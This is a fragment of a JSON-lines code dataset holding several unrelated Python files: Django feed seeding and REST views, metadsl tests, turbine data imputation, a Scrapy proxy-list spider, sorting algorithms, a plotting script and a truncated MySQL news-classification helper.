\"https://www.ft.com/us?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;usa\",\n \"importance\": 0,\n },\n {\n \"name\": \"Country UK\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/world-uk?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;uk\",\n \"importance\": 0,\n },\n {\n \"name\": \"Region Europe\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/europe?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;europe\",\n \"importance\": 0,\n },\n {\n \"name\": \"Top News\",\n \"publisher\": Publisher.objects.get(name=\"CNBC\"),\n \"url\": \"https://search.cnbc.com/rs/search/combinedcms/view.xml?partnerId=wrss01&id=100003114\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 1,\n },\n {\n \"name\": \"Markets\",\n \"publisher\": Publisher.objects.get(name=\"CNBC\"),\n \"url\": \"https://search.cnbc.com/rs/search/combinedcms/view.xml?partnerId=wrss01&id=20910258\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;markets\",\n \"importance\": 1,\n },\n {\n \"name\": \"Markets\",\n \"publisher\": Publisher.objects.get(name=\"Reuters\"),\n \"url\": (\n \"http://FEED-CREATOR.local/extract.php?url=https%3A%2F%2Fwww.reuters.com%2Fmarkets%2F&\"\n \"in_id_or_class=content-layout__item__SC_GG&max=19&order=document&guid=0&strip_if_url%5B0%5D=\"\n \"author&strip=.label__label__f9Hew%2C.events__data__18XBG%2C.media-story-card__placement-\"\n \"container__1R55-%2C.topic__header__3T_p2&keep_qs_params=\"\n ),\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;markets\",\n \"importance\": 0,\n },\n {\n \"name\": \"All News\",\n \"publisher\": Publisher.objects.get(name=\"Risk.net\"),\n \"url\": \"http://www.risk.net/feeds/rss/\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 0,\n },\n {\n \"name\": \"All News\",\n \"publisher\": Publisher.objects.get(name=\"Al Jazeera\"),\n \"url\": \"https://www.aljazeera.com/xml/rss/all.xml\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 2,\n },\n {\n \"name\": \"All News\",\n \"publisher\": Publisher.objects.get(name=\"Deutsche Welle\"),\n \"url\": \"http://rss.dw.com/rdf/rss-en-all\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 1,\n },\n {\n \"name\": \"Markets\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://feeds.bloomberg.com/markets/news.rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"N\",\n \"source_categories\": \"frontpage;markets\",\n \"importance\": 3,\n },\n {\n \"name\": \"Politics\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://feeds.bloomberg.com/politics/news.rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"N\",\n \"source_categories\": \"frontpage;politics\",\n \"importance\": 1,\n },\n {\n \"name\": \"Top News\",\n \"publisher\": Publisher.objects.get(name=\"The Economist\"),\n \"url\": (\n \"http://FEED-CREATOR.local/mergefeeds.php?url%5B0%5D=https%3A%2F%2Fwww.economist.com%2F\"\n \"briefing%2Frss.xml&url%5B1%5D=https%3A%2F%2Fwww.economist.com%2Ffinance-and-economics%2F\"\n \"rss.xml&max=5&order=date\"\n ),\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;magazine\",\n \"importance\": 1,\n },\n {\n \"name\": \"Countries\",\n \"publisher\": Publisher.objects.get(name=\"The Economist\"),\n \"url\": (\n \"http://FEED-CREATOR.local/mergefeeds.php?url%5B0%5D=https%3A%2F%2Fwww.economist.com%2F\"\n \"europe%2Frss.xml&url%5B1%5D=https%3A%2F%2Fwww.economist.com%2Finternational%2Frss.xml&\"\n \"url%5B2%5D=https%3A%2F%2Fwww.economist.com%2Funited-states%2Frss.xml&url%5B3%5D=\"\n \"https%3A%2F%2Fwww.economist.com%2Fthe-americas%2Frss.xml&url%5B4%5D=https%3A%2F%2F\"\n \"www.economist.com%2Fmiddle-east-and-africa%2Frss.xml&url%5B5%5D=https%3A%2F%2F\"\n \"www.economist.com%2Fasia%2Frss.xml&url%5B6%5D=https%3A%2F%2F\"\n \"www.economist.com%2Fchina%2Frss.xml&url%5B7%5D=https%3A%2F%2F\"\n \"www.economist.com%2Fbritain%2Frss.xml&max=12&order=date\"\n ),\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;magazine;world\",\n \"importance\": 0,\n },\n ########################### Fund News ###########################\n {\n \"name\": \"All News\",\n \"publisher\": Publisher.objects.get(name=\"The Trade\"),\n \"url\": \"https://www.thetradenews.com/feed/\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;funds;sidebar\",\n \"importance\": 1,\n },\n {\n \"name\": \"Latest\",\n \"publisher\": Publisher.objects.get(name=\"Hedge Week\"),\n \"url\": \"https://www.hedgeweek.com/feed/\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"hedge funds;funds;sidebar\",\n \"importance\": 3,\n },\n {\n \"name\": 'Search \"Hedge Funds\"',\n \"publisher\": Publisher.objects.get(name=\"Google News\"),\n \"url\": \"https://news.google.com/rss/search?q=hedge+fund\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"google news;hedge funds;funds;sidebar\",\n \"importance\": 0,\n },\n ########################### German News ###########################\n {\n \"name\": \"Startseite\",\n \"publisher\": Publisher.objects.get(name=\"Tagesschau\"),\n \"url\": \"https://www.tagesschau.de/index~rss2.xml\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"startseite\",\n \"importance\": 2,\n },\n {\n \"name\": \"Startseite\",\n \"publisher\": Publisher.objects.get(name=\"FAZ\"),\n \"url\": \"https://www.faz.net/rss/aktuell/\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"startseite\",\n \"importance\": 1,\n },\n {\n \"name\": \"Startseite\",\n \"publisher\": Publisher.objects.get(name=\"ZDF Heute\"),\n \"url\": \"https://www.zdf.de/rss/zdf/nachrichten\",\n \"active\": False,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"startseite\",\n \"importance\": 2,\n },\n {\n \"name\": \"Wirtschaft\",\n \"publisher\": Publisher.objects.get(name=\"n-tv.de\"),\n \"url\": \"https://www.n-tv.de/wirtschaft/rss\",\n \"active\": False,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"wirtschaft\",\n \"importance\": 1,\n },\n {\n \"name\": \"Politik\",\n \"publisher\": Publisher.objects.get(name=\"n-tv.de\"),\n \"url\": \"https://www.n-tv.de/politik/rss\",\n \"active\": False,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"politik\",\n \"importance\": 1,\n },\n {\n \"name\": \"Politik\",\n \"publisher\": Publisher.objects.get(\n name=\"Redations Netzwerk Deutschland\"\n ),\n \"url\": \"https://www.rnd.de/arc/outboundfeeds/rss/category/politik/\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"wirtschaft\",\n \"importance\": 1,\n },\n {\n \"name\": \"Wirtschaft\",\n \"publisher\": Publisher.objects.get(\n name=\"Redations Netzwerk Deutschland\"\n ),\n \"url\": \"https://www.rnd.de/arc/outboundfeeds/rss/category/wirtschaft/\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"politik\",\n \"importance\": 1,\n },\n ########################### Tech News ###########################\n {\n \"name\": \"Technology\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://feeds.bloomberg.com/technology/news.rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"N\",\n \"source_categories\": \"tech\",\n \"importance\": 0,\n },\n {\n \"name\": \"Home\",\n \"publisher\": Publisher.objects.get(name=\"9to5mac.com\"),\n \"url\": \"http://9to5mac.com/feed/\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"tech\",\n \"importance\": 2,\n },\n {\n \"name\": \"Home\",\n \"publisher\": Publisher.objects.get(name=\"TechCrunch\"),\n \"url\": \"http://feeds.feedburner.com/Techcrunch\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"tech\",\n \"importance\": 2,\n },\n {\n \"name\": \"Home\",\n \"publisher\": Publisher.objects.get(name=\"The Verge\"),\n \"url\": \"http://www.theverge.com/rss/full.xml\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"tech\",\n \"importance\": 2,\n },\n {\n \"name\": \"Home\",\n \"publisher\": Publisher.objects.get(name=\"TheNextWeb\"),\n \"url\": \"https://thenextweb.com/feed\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"tech\",\n \"importance\": 2,\n },\n {\n \"name\": \"#Python\",\n \"publisher\": Publisher.objects.get(name=\"Medium\"),\n \"url\": \"https://medium.com/feed/tag/python\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"N\",\n \"source_categories\": \"tech\",\n \"importance\": 0,\n },\n ########################### YouTube Channels ###########################\n {\n \"name\": \"Originals - YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://www.youtube.com/Bloomberg\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"Quicktake - YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Bloomberg\"),\n \"url\": \"https://www.youtube.com/@BloombergQuicktake\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.youtube.com/@FinancialTimes\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"The Economist\"),\n \"url\": \"https://www.youtube.com/@TheEconomist\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Harvard Business Review\"),\n \"url\": \"https://www.youtube.com/@harvardbusinessreview\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Wall Street Journal\"),\n \"url\": \"https://www.youtube.com/@wsj\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Stuff Made Here\"),\n \"url\": \"https://www.youtube.com/@StuffMadeHere\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 0,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Teulu Tribe\"),\n \"url\": \"https://www.youtube.com/@TeuluTribe\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Deutsche Welle\"),\n \"url\": \"https://www.youtube.com/@DWDocumentary\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"CNBC\"),\n \"url\": \"https://www.youtube.com/@CNBC\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"TED - YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"TED\"),\n \"url\": \"https://www.youtube.com/@TED\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"TEDed - YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"TED\"),\n \"url\": \"https://www.youtube.com/@TEDEd\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Vox\"),\n \"url\": \"https://www.youtube.com/@Vox\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"Wendover Productions\"),\n \"url\": \"https://www.youtube.com/@Wendoverproductions\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"BigThink\"),\n \"url\": \"https://www.youtube.com/@bigthink\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"EconomicsExplained\"),\n \"url\": \"https://www.youtube.com/@EconomicsExplained\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 2,\n },\n {\n \"name\": \"YouTube Channel\",\n \"publisher\": Publisher.objects.get(name=\"RealEngineering\"),\n \"url\": \"https://www.youtube.com/@RealEngineering\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-channel\",\n \"importance\": 1,\n },\n {\n \"name\": \"World Services - YouTube Playlist\",\n \"publisher\": Publisher.objects.get(name=\"BBC\"),\n \"url\": \"https://www.youtube.com/playlist?list=PLz_B0PFGIn4fADt3h_U2SOWErIq-xtXPD\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"feed_type\": \"y-playlist\",\n \"importance\": 1,\n },\n ]\n\n for feed in initial_feeds:\n Feed(**feed).save()\n\n initial_pages = [\n {\n \"position_index\": 1,\n \"html_icon\": \"\",\n \"name\": \"Frontpage\",\n \"url_parameters\": \"categories=frontpage\",\n },\n {\n \"position_index\": 2,\n \"html_icon\": (\n ''\n ),\n \"name\": \"German\",\n \"url_parameters\": \"language=de\",\n },\n {\n \"position_index\": 3,\n \"html_icon\": \"#\",\n \"name\": \"Tech\",\n \"url_parameters\": \"categories=tech\",\n },\n {\n \"position_index\": 4,\n \"html_icon\": (\n ''\n ),\n \"name\": \"Latest: Funds\",\n \"url_parameters\": \"special=sidebar\",\n },\n {\n \"position_index\": 5,\n \"html_icon\": \"@\",\n \"name\": \"FT & BBG\",\n \"url_parameters\": (\n \"publisher__name=financial+times,bloomberg&content_type=article\"\n ),\n },\n {\n \"position_index\": 6,\n \"html_icon\": (\n ''\n ),\n \"name\": \"Videos\",\n \"url_parameters\": \"content_type=video\",\n },\n {\n \"position_index\": 7,\n \"html_icon\": (\n ' '\n ),\n \"name\": \"Read Later\",\n \"url_parameters\": \"read_later=true\",\n },\n ]\n\n for page in initial_pages:\n Page(**page).save()\n","repo_name":"vanalmsick/news_platform","sub_path":"feeds/management/commands/add_default_feeds.py","file_name":"add_default_feeds.py","file_ext":"py","file_size_in_byte":35728,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"19518945663","text":"from __future__ import annotations\n\nfrom metadsl import *\nfrom metadsl_rewrite import *\n\nfrom .abstraction import *\nfrom .conversion import *\nfrom .either import *\nfrom .integer import *\nfrom .maybe import *\nfrom .pair import *\nfrom .strategies import *\nfrom .vec import *\n\n\nclass Int(Expression):\n @expression\n @classmethod\n def from_int(cls, i: int) -> Int:\n ...\n\n\nclass Str(Expression):\n @expression\n @classmethod\n def from_str(cls, s: str) -> Str:\n ...\n\n\n@rule\ndef convert_to_int(i: int, s: str) -> R[Maybe[Int]]:\n yield Converter[Int].convert(i), lambda: Maybe.just(Int.from_int(i))\n yield Converter[Int].convert(s), Maybe[Int].nothing()\n\n\n@rule\ndef convert_to_str(i: int, s: str) -> R[Maybe[Str]]:\n yield Converter[Str].convert(s), lambda: Maybe.just(Str.from_str(s))\n yield Converter[Str].convert(i), Maybe[Str].nothing()\n\n\nvec_convert = register.tmp(convert_to_str, convert_to_int)\n\n\nclass TestVec:\n def test_getitem(self):\n assert execute(Vec.create(10, 11)[Integer.from_int(1)]) == 11\n\n def test_append(self):\n assert execute(Vec.create(10).append(11)) == Vec.create(10, 11)\n\n @vec_convert\n def test_convert_empty(self):\n assert execute(Converter[Vec[Int]].convert(())) == Maybe.just(Vec[Int].create())\n\n @vec_convert\n def test_convert_items(self):\n assert execute(Converter[Vec[Int]].convert((1, 2))) == Maybe.just(\n Vec.create(Int.from_int(1), Int.from_int(2))\n )\n\n @vec_convert\n def test_invalid_conversion(self):\n assert (\n execute(Converter[Vec[Int]].convert((1, \"hi\"))) == Maybe[Vec[Int]].nothing()\n )\n assert (\n execute(Converter[Vec[Int]].convert((\"hi\", 1))) == Maybe[Vec[Int]].nothing()\n )\n assert (\n execute(Converter[Vec[Int]].convert((\"hi\",))) == Maybe[Vec[Int]].nothing()\n )\n\n def test_pop(self):\n assert execute(Vec.create(10, 11).pop()) == Pair.create(Vec[int].create(10), 11)\n","repo_name":"metadsl/metadsl","sub_path":"metadsl_core/vec_test.py","file_name":"vec_test.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"67"} +{"seq_id":"16792375111","text":"from django.shortcuts import render, HttpResponse\n\nfrom rest_framework import viewsets, generics\n\nfrom .models import Empleado, Empresa\n\nfrom .serializer import EmpresaSerializer, EmpleadoSerializer, EmpresaNameSerializer\n\n# Create your views here.\n\n\nclass EmpresaList(viewsets.ModelViewSet):\n queryset = Empresa.objects.all()\n serializer_class = EmpresaSerializer\n\n\nclass EmpleadoList(viewsets.ModelViewSet):\n queryset = Empleado.objects.all()\n serializer_class = EmpleadoSerializer\n\nclass EmpresaListName(viewsets.ModelViewSet):\n queryset = Empresa.objects.all()\n serializer_class = EmpresaNameSerializer\n\n\nclass EmployeeListByCompany(viewsets.ModelViewSet):\n serializer_class = EmpleadoSerializer\n\n def get_queryset(self):\n company_id = self.kwargs['company_id']\n return Empleado.objects.filter(id_empresa=company_id)\n\n\ndef home(request):\n return HttpResponse(\"Hola Mundo\")","repo_name":"lucianohuenuvil/TuEmpleadoPerfecto","sub_path":"TuEmpleadoPerfecto-Back/TuEmpleadoPerfecto/mainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35738168920","text":"import copy\nfrom data_processing import data_processing_config\n\n#impute_feature(turbine_group, \"1528-22\", \"MDY01-CT009-XQ50\", mean_for_temp_main)\ndef impute_feature(turbine_group, new_values, turbine_name=data_processing_config.TURBINE_NAME, feature_id=data_processing_config.FEATURE_ID):\n \"\"\"\n Impute the values of a turbine's feature\n Parameters:\n -----------\n turbine_group: dict\n A dictionary storing a set of dataframes as values with keys as turbine names \n turbine_name: str\n A string with the name of the turbine (i.e. \"1528-22\")\n feature_id: str\n A string with the suffix of the feature to be used for calculation. i.e. \"MDY01-CT009-XQ50\"\n new_values: pandas.Series\n A pandas series with the values to be used to impute\n Return:\n -------\n dict\n A new dictionary storing a set of dataframes as values with keys as turbine names\n \"\"\"\n imputed_turbine_group = copy.deepcopy(turbine_group)\n\n for key, value in imputed_turbine_group.items():\n if key == turbine_name:\n value[feature_id] = new_values.values\n\n return imputed_turbine_group\n ","repo_name":"Haizhuolaojisite/Anomaly_Detection","sub_path":"data_processing/impute_feature.py","file_name":"impute_feature.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42378450061","text":"from scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\n\nfrom redis import StrictRedis\n\n\nclass ProxySpider (CrawlSpider):\n name = 'cnproxy'\n allowed_domains = ['www.cnproxy.com']\n start_urls = ['http://www.cnproxy.com/proxy1.html',]\n rules = (\n Rule(SgmlLinkExtractor(allow=('http://www.cnproxy.com/proxy\\d+.html',)), callback='parse_item',),\n #Rule(SgmlLinkExtractor(allow=('.*',)),),\n )\n redis_cli = StrictRedis(host='localhost', port=6379, db=0)\n \n mapping = {'z':\"3\", 'm':\"4\", 'a':\"2\", 'l':\"9\", 'f':\"0\", 'b':\"5\", 'i':\"7\", 'w':\"6\", 'x':\"8\", 'c':\"1\" }\n \n def parse_item(self, response):\n hxs = HtmlXPathSelector(response)\n trs = hxs.select('//div[@id=\"proxylisttb\"]/table[3]/tr')\n trs.remove(trs[0])\n \n for tr in trs:\n o = tr.select('td[1]/script/text()').extract()[0][:-1].split('+')\n o.remove(o[0])\n try:\n port = ''.join([self.mapping[c] for c in o])\n except KeyError:\n prot = ':80'\n \n proxy = '%s://%s:%s' % (tr.select('td[2]/text()').extract()[0], tr.select('td[1]/text()').extract()[0], port)\n self.redis_cli.sadd('proxies', proxy)\n \n pass\n \n \n\n","repo_name":"hankya/questions","sub_path":"exampapers/spiders/cnproxy.py","file_name":"cnproxy.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31555937009","text":"# coding=utf-8\nfrom django.db import models\n\nfrom solo.models import SingletonModel\n\n\nclass InstallProgress(SingletonModel):\n \"\"\"\n Keeps track of the installation progress\n \"\"\"\n installed = models.BooleanField(default=False)\n\n site_name_ok = models.BooleanField(default=False)\n modules_ok = models.BooleanField(default=False)\n menu_ok = models.BooleanField(default=False)\n\n @classmethod\n def site_name_set(cls):\n \"\"\"\n Marks the site name as set\n :return:\n \"\"\"\n progress, created = cls.objects.get_or_create()\n progress.site_name_ok = True\n progress.save()\n\n @classmethod\n def is_site_name_set(cls):\n progress, created = cls.objects.get_or_create()\n return progress.site_name_ok\n\n @classmethod\n def modules_set(cls):\n \"\"\"\n Marks the modules as selected\n :return:\n \"\"\"\n progress, created = cls.objects.get_or_create()\n progress.modules_ok = True\n progress.save()\n\n @classmethod\n def is_modules_set(cls):\n progress, created = cls.objects.get_or_create()\n return progress.modules_ok\n\n @classmethod\n def menu_set(cls):\n \"\"\"\n Marks the menu as set up\n :return:\n \"\"\"\n progress, created = cls.objects.get_or_create()\n progress.menu_ok = True\n progress.save()\n\n @classmethod\n def is_menu_set(cls):\n progress, created = cls.objects.get_or_create()\n return progress.menu_ok\n\n @classmethod\n def finish(cls):\n \"\"\"\n Checks that all parts of the installation are completed, then marks it as installed\n \"\"\"\n progress, created = cls.objects.get_or_create()\n if progress.site_name_ok and progress.modules_ok and progress.menu_ok:\n progress.installed = True\n else:\n progress.installed = False\n progress.save()\n\n @classmethod\n def is_finished(cls):\n \"\"\"\n :return: A boolean indicating whether the installation is finished or not.\n \"\"\"\n progress, created = cls.objects.get_or_create()\n return progress.installed\n","repo_name":"Lundis/SAW","sub_path":"studassweb/install/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21242748703","text":"# Histograms of values at certain timestamps (e.g. 3 am)\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\n# read csv, dates is in column 1, and reset the indexing\ndf = (pd.read_csv(os.path.join('data', 'withWeather', 'data_with_weather_2021-08-24.csv'),\n parse_dates=[1])\n .reset_index(drop=True)\n )\n\n# create a list of dataframes\nsensor_names = ['Ruecklauf', 'Vorlauf']\nsensors = []\nfor nPos in [0, 7]:\n sensors.append(df.loc[df['Position'] == nPos, ['Timestamp', 'Value']]\n .reset_index(drop=True)\n )\n\nhour = 12\n\nfig, axs = plt.subplots(nrows = 2, ncols = 1, sharex = True, sharey = True)\nbins = np.arange(15, 55, 0.2)\n\n# plot histograms at the hour\nfor n in [0, 1]:\n data = sensors[n].loc[sensors[n]['Timestamp'].dt.hour == hour, ['Value']]\n axs[n].hist(data, bins)\n axs[n].set_title('BW' + sensor_names[n])\n\nplt.xticks(ticks = bins[::5])\nplt.xlabel('Temperatures, degrees C')\nfig.supylabel('Frequency')\nfig.suptitle('Condensing boiler (BW) temperatures, hour ' + str(hour) + ', entire dataset')\nplt.show()","repo_name":"hattamisra/SigmaHeat-data-analysis","sub_path":"aa_final_files/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24648732621","text":"__author__ = 'edwardvella'\n\n\ndef bubble_sort(arr):\n \"\"\"\n Performs a bubble sort algorithm.\n :param arr: an unsorted array\n :return: a sorted array\n \"\"\"\n arr_len = len(arr)\n swaps = True\n while swaps:\n swaps = False\n for i in range(0, arr_len - 1):\n if arr[i] > arr[i + 1]:\n # swap the items\n temp = arr[i]\n arr[i] = arr[i + 1]\n arr[i + 1] = temp\n swaps = True\n return arr\n\n\ndef heap_sort(arr):\n \"\"\"\n Performs a heap sort algorithm\n :param arr: an unsorted array\n :return: a sorted array\n \"\"\"\n from Sorting.HeapSorting import HeapSorting\n heap = HeapSorting(arr)\n for i in range(0, len(arr))[::-1]:\n heap.swap(0, i)\n heap.heap_size -= 1\n heap.max_heapify(0)\n return heap.A\n\n\ndef quick_sorting(arr):\n \"\"\"\n Performs a quick sort algorithm\n :param arr: an unsorted array\n :return: a sorted array\n \"\"\"\n from Sorting.QuickSorting import QuickSort\n quicksort = QuickSort(arr)\n quicksort.quick_sort(0, len(arr) - 1)\n return quicksort.A\n\n\narray = [4, 1, 3, 2, 16, 9, 10, 14, 8, 7]\ntarget_array = [1, 2, 3, 4, 7, 8, 9, 10, 14, 16]\nquick_sorting(array)\n","repo_name":"dwardu89/learning-python-programming","sub_path":"Sorting/Sorter.py","file_name":"Sorter.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17943261948","text":"\nimport pandas as pd\nimport jieba\n\nimport string\nimport time\nimport traceback\n\nimport pymysql\nimport requests\nimport re\n\nfrom bs4 import BeautifulSoup\nfrom flask import json\nimport nltk\nfrom nltk.corpus import brown\n\n#数据库的连接与查询\n\n\ndef get_conn_mysql():\n \"\"\"\n :return: 连接,游标192.168.1.102\n \"\"\"\n # 创建连接\n conn = pymysql.connect(host=\"127.0.0.1\",\n user=\"root\",\n password=\"123456\",\n db=\"new_class\",\n charset=\"utf8\")\n # 创建游标\n cursor = conn.cursor() # 执行完毕返回的结果集默认以元组显示\n return conn, cursor\ndef close_conn_mysql(conn, cursor):\n if cursor:\n cursor.close()\n if conn:\n conn.close()\ndef query_mysql(sql,*args):\n \"\"\"\n 封装通用查询\n :param sql:\n :param args:\n :return: 返回查询结果以((),(),)形式\n \"\"\"\n conn,cursor = get_conn_mysql();\n cursor.execute(sql)\n res=cursor.fetchall()\n close_conn_mysql(conn,cursor)\n return res\n\n#插入数据库\ndef insert_into_mysql(content,channelName,title):\n conn,cursor=get_conn_mysql()\n 